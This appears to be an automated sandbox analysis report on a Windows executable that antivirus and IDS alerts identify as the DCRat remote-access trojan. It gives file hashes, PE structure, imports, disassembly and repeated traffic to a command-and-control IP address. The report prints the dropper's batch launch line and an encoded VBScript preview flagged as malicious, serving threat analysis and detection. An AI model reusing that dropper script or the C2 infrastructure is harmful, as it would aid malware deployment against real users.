Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat

Download File

Process:	C:\Users\user\Desktop\5Ixz5yVfS7.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.19870825257941
Encrypted:	false
SSDEEP:	3:5IlTVKdKqBVX0di:5IX7qBudi
MD5:	DB4D25A773EE938F539451FD566C88A9
SHA1:	C97BA1C8EC9617FFBD995395EF142E0A3C89AEA2
SHA-256:	056F774D8D53A657C2F4FDCE7AB0F582771F76E831A3F8890AFE5DC083B7596F
SHA-512:	5A99DDD8965D6CE1436ACF5371CABE4BB41DE830324B5FCE92FC74C7312C98DCB2CF1DD3C0D2B328E62B481BC34CA942D563B8B7D781ED7598FF7BA42ACC549F
Malicious:	false
Reputation:	low
Preview:	"%Temp%\ComponentfontintoDll\Bridgecontainer.exe"

C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe

Download File

Process:	C:\Users\user\Desktop\5Ixz5yVfS7.exe
File Type:	data
Category:	dropped
Size (bytes):	207
Entropy (8bit):	5.792659830467576
Encrypted:	false
SSDEEP:	6:GLwqK+NkLzWbHK/818nZNDd3RL1wQJRQdmQ/7Hif1:GiMCzWLKG4d3XBJbW7M
MD5:	E115EF6D0CA1F43393A02610609CDB14
SHA1:	09DA58489CA5BF69FB1C597B96D08997CC4EAFBC
SHA-256:	43C90790C5676FA543398A25C1485A8D5C08AF1A8411BBE0E8810785EE44AD29
SHA-512:	3B4C9BD9B92F7B078519523798839E03AC7A9CA0D8AB480E9BABDFA3C7141B0A75A6E4FA956D875D7CAF8B26CFD368D45F1C4F635AA7FD67F05923BFFE25550E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	#@~^tgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JuP.:2uz;W:aW.nxD0GxDkUOKfV^&CZf3\p 4mYr~~!S~6ls/.GToAAA==^#~@.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.373996791003091
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	5Ixz5yVfS7.exe
File size:	1'164'920 bytes
MD5:	7b4eccf10cc4fa7263646f2fce4d7f8b
SHA1:	06111e9aa4ae84c68208e3800ad757f1eb80c227
SHA256:	752b44a9225f3423d045835f61cedc897696680e2caeead0d472f367da14e898
SHA512:	f5a38968e235a8750eb5b18e4202bbb275d51e35a0461955720507adcb902b5f8a6d6b59b940f96df66800278fff3cd14e388811d57766d0dfc24f603879fb93
SSDEEP:	24576:U2G/nvxW3Ww0tNU2xxm8eFjhoiRQROImS/7xFPdp:UbA30NU+UtEj/9FD
TLSH:	01455A027E44CE12F4191633C6FF492447B4AC552AA6E72B7EBA376D55223937C0CACB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007FDD48E3CC49h
jmp 00007FDD48E3C65Dh
cmp ecx, dword ptr [0043E668h]
jne 00007FDD48E3C7D5h
ret
jmp 00007FDD48E3CDCEh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FDD48E2F567h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007FDD48E3F96Dh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FDD48E2F4FEh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FDD48E3F082h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FDD48E3C774h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FDD48E3F065h
int3
jmp 00007FDD48E410B3h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0xdfd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	c5bf61bbedb6ad471e9dc6266398e965	False	0.583959526081425	data	6.708075396341128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	7980b588d5b28128a2f3c36cabe2ce98	False	0.45284598214285715	data	5.221742709250668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	201530c9e56f172adf2473053298d48f	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x188	0x200	c5d41d8f254f69e567595ab94266cfdc	False	0.4453125	data	3.2982538067961342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0xdfd0	0xe000	f6c0f34fae6331b50a7ad2efc4bfefdb	False	0.6370326450892857	data	6.6367506404157535	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x2268	0x2400	c7a942b723cb29d9c02f7c611b544b50	False	0.7681206597222222	data	6.5548620101740545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x63650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x64198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x65748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x65cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x66558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x67400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x67868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x68910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6aeb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x6f588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x6f358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x6f498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x6f228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6eef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6ec98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x6ff68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x70150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x70320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x704d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x70620	0x446	data	English	United States	0.340036563071298
RT_STRING	0x70a68	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x70bd0	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x70d28	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x70e38	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x70ef8	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6ec30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x6f810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T05:17:06.085876+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49704	141.8.192.151	80	TCP
2025-01-02T05:17:12.379192+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	141.8.192.151	80	192.168.2.5	49706	TCP
2025-01-02T05:18:27.514248+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	141.8.192.151	80	192.168.2.5	49987	TCP
2025-01-02T05:20:28.241324+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	141.8.192.151	80	192.168.2.5	50009	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 05:17:05.233977079 CET	49704	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:05.238905907 CET	80	49704	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:05.239003897 CET	49704	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:05.239795923 CET	49704	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:05.244545937 CET	80	49704	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:06.085664988 CET	80	49704	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:06.085701942 CET	80	49704	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:06.085712910 CET	80	49704	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:06.085875988 CET	49704	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:06.171778917 CET	80	49704	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:06.224571943 CET	49704	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:06.470499039 CET	49704	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:06.472033024 CET	49705	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:06.475528955 CET	80	49704	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:06.475543976 CET	80	49704	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:06.476861000 CET	80	49705	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:06.476927042 CET	49705	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:06.477078915 CET	49705	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:06.481928110 CET	80	49705	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:06.688663960 CET	80	49704	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:06.740102053 CET	49704	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:07.152820110 CET	80	49705	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:07.158070087 CET	49704	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:07.158274889 CET	49705	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:07.163094997 CET	80	49705	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:07.163186073 CET	80	49705	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:07.163198948 CET	80	49704	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:07.163254976 CET	49704	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:07.370100021 CET	80	49705	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:07.411956072 CET	49705	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:11.693825006 CET	49705	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:11.695013046 CET	49706	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:11.698951960 CET	80	49705	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:11.699055910 CET	49705	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:11.699820042 CET	80	49706	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:11.699892044 CET	49706	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:11.700022936 CET	49706	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:11.704792976 CET	80	49706	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:11.704936981 CET	80	49706	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:12.373090982 CET	80	49706	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:12.374084949 CET	49706	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:12.379192114 CET	80	49706	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:12.379266024 CET	49706	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:17.382556915 CET	49724	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:17.387518883 CET	80	49724	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:17.388425112 CET	49724	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:17.388451099 CET	49724	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:17.393256903 CET	80	49724	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:17.393362999 CET	80	49724	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:18.150692940 CET	80	49724	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:18.193223953 CET	49724	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:23.162602901 CET	49724	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:23.163744926 CET	49757	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:23.167761087 CET	80	49724	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:23.167819977 CET	49724	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:23.168606997 CET	80	49757	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:23.168684006 CET	49757	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:23.168836117 CET	49757	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:23.173619986 CET	80	49757	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:23.173795938 CET	80	49757	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:23.844237089 CET	80	49757	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:23.896502018 CET	49757	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:27.707722902 CET	80	49757	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:27.707778931 CET	49757	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:28.851953983 CET	49798	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:28.856796026 CET	80	49798	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:28.856857061 CET	49798	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:28.857894897 CET	49798	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:28.862782955 CET	80	49798	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:28.862843037 CET	80	49798	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:29.604166031 CET	80	49798	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:29.646370888 CET	49798	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:34.615767002 CET	49798	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:34.616636992 CET	49829	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:34.620912075 CET	80	49798	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:34.620981932 CET	49798	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:34.621494055 CET	80	49829	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:34.621665955 CET	49829	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:34.621783972 CET	49829	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:34.626555920 CET	80	49829	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:34.626683950 CET	80	49829	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:35.325664043 CET	80	49829	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:35.380732059 CET	49829	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:40.336118937 CET	49829	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:40.336908102 CET	49867	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:40.341705084 CET	80	49867	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:40.341772079 CET	49867	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:40.341936111 CET	49867	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:40.342961073 CET	80	49829	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:40.343015909 CET	49829	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:40.346776962 CET	80	49867	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:40.346834898 CET	80	49867	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:41.044749022 CET	80	49867	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:41.099486113 CET	49867	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:46.053141117 CET	49867	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:46.053872108 CET	49906	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:46.058341980 CET	80	49867	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:46.058691025 CET	80	49906	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:46.058741093 CET	49867	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:46.058767080 CET	49906	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:46.058950901 CET	49906	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:46.063796043 CET	80	49906	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:46.063880920 CET	80	49906	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:46.779894114 CET	80	49906	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:46.833868980 CET	49906	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:51.790357113 CET	49906	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:51.794353008 CET	49940	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:51.795392036 CET	80	49906	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:51.795447111 CET	49906	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:51.799221992 CET	80	49940	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:51.799293995 CET	49940	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:51.802097082 CET	49940	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:51.806927919 CET	80	49940	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:51.807018995 CET	80	49940	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:52.626235008 CET	80	49940	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:52.677648067 CET	49940	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:57.631391048 CET	49940	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:57.632100105 CET	49981	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:57.636607885 CET	80	49940	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:57.636781931 CET	49940	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:57.636838913 CET	80	49981	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:57.636909962 CET	49981	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:57.637072086 CET	49981	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:17:57.641824007 CET	80	49981	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:57.641946077 CET	80	49981	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:58.308748007 CET	80	49981	141.8.192.151	192.168.2.5
Jan 2, 2025 05:17:58.349513054 CET	49981	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:03.324995041 CET	49981	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:03.330312967 CET	80	49981	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:03.330425024 CET	49981	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:03.339905024 CET	49987	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:03.344702005 CET	80	49987	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:03.344778061 CET	49987	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:03.347429037 CET	49987	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:03.352237940 CET	80	49987	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:03.352308989 CET	80	49987	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:04.023752928 CET	80	49987	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:04.068264961 CET	49987	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:09.038755894 CET	49988	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:09.044624090 CET	80	49988	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:09.044702053 CET	49988	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:09.044888973 CET	49988	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:09.050617933 CET	80	49988	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:09.050743103 CET	80	49988	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:09.719713926 CET	80	49988	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:09.771528006 CET	49988	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:14.725260019 CET	49988	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:14.726139069 CET	49989	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:14.730546951 CET	80	49988	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:14.730626106 CET	49988	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:14.731023073 CET	80	49989	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:14.731091022 CET	49989	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:14.732865095 CET	49989	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:14.737687111 CET	80	49989	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:14.737838984 CET	80	49989	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:15.414184093 CET	80	49989	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:15.458894014 CET	49989	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:20.428272009 CET	49989	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:20.428970098 CET	49990	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:20.433471918 CET	80	49989	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:20.433811903 CET	80	49990	141.8.192.151	192.168.2.5
